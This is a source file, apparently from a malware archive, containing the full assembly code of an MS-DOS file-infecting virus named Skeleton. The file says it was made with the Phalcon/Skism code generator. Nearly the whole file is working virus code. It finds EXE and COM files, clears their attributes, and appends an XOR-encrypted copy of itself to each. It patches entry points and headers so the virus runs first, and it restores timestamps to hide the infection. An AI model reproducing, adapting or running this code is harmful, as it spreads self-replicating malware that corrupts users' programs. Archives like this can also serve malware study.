MalwareSourceCode/MSDOS/S-Index/Virus.MSDOS.Unknown.skeleton.asm

303 lines
10 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; target.asm : [Skeleton] by Deke
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
id = 'DA' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
startvirus:
decrypt: ; handles encryption and decryption
patch_startencrypt:
mov bp,offset startencrypt ; start of decryption
mov ax,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,76h,0 ; xor word ptr cs:[bp], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc bp ; calculate new decryption location
inc bp
dec ax ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+offset save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+offset oldCSIP2]
lea di,[bp+offset oldCSIP]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],3 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+offset newDTA] ; new DTA @ DS:DX
int 21h
lea dx,[bp+offset exe_mask]
call infect_mask
lea dx,[bp+offset com_mask]
call infect_mask
done_infections:
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+oldCSIP+2],ax
add ax,word ptr cs:[bp+oldSSSP+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+oldSSSP]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
oldCSIP db ? ; Original CS:IP (4 bytes)
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
oldSSSP dd ? ; Original SS:SP
oldCSIP2 dd ?
oldSSSP2 dd ?
creator db '[MPC]',0 ; Mass Produced Code Generator
virus db '[Skeleton]',0
author db 'Deke',0
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov ax,3d02h ; Open read/write
int 21h
xchg ax,bx
mov ah,3fh ; Read file to buffer
lea dx,[bp+offset buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ax,4202h ; Go to end of file
xor cx,cx
cwd
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,65535-(endheap-decrypt) ; Is it too large?
ja find_next
mov cx,word ptr [bp+buffer+1]; get jmp location
add cx,heap-startvirus+3 ; Adjust for virus size
cmp ax,cx ; Already infected?
je find_next
jmp infect_com
checkEXE:
cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
done_file:
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
cmp byte ptr [bp+numinfec], 0; Enough infections?
jnz find_next
pop ax ; remove call from stack
jmp done_infections
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
mov cx, 1ah
push cx
push bx ; Save file handle
les ax,dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+oldCSIP2], ax
mov word ptr [bp+oldCSIP2+2], es
les ax,dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+oldSSSP2],es
mov word ptr [bp+oldSSSP2+2],ax
mov ax,word ptr [bp+buffer+8]; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax,dword ptr [bp+newDTA+26] ; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
pop bx ; Restore file handle
add ax, heap-startvirus ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
mov ax,word ptr [bp+buffer+14h] ; needed later
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
push cx
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
finishinfection:
add ax,offset startencrypt-offset decrypt
push ax
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+offset codestore]
mov al,55h ; push bp
stosb
lea si,[bp+offset decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+offset write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop ax
push di
push si
push cx
rep movsb ; Copy decryption function
mov word ptr [bp+patch_startencrypt+1],ax
mov al,5dh ; pop bx
stosb
mov al,0c3h ; retn
stosb
call codestore ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,4200h ; Move file pointer
xor cx,cx ; to beginning of file
cwd ; xor dx,dx
int 21h
mov ah,40h ; Write to file
lea dx,[bp+offset buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
dec byte ptr [bp+numinfec] ; One mo infection
jmp done_file
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+offset newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+offset decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bp
endwrite:
exe_mask db '*.exe',0
com_mask db '*.com',0
heap: ; Variables not in code
; The following code is the buffer for the write function
codestore:db (startencrypt-decrypt)*2+(endwrite-write)+3 dup (?)
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point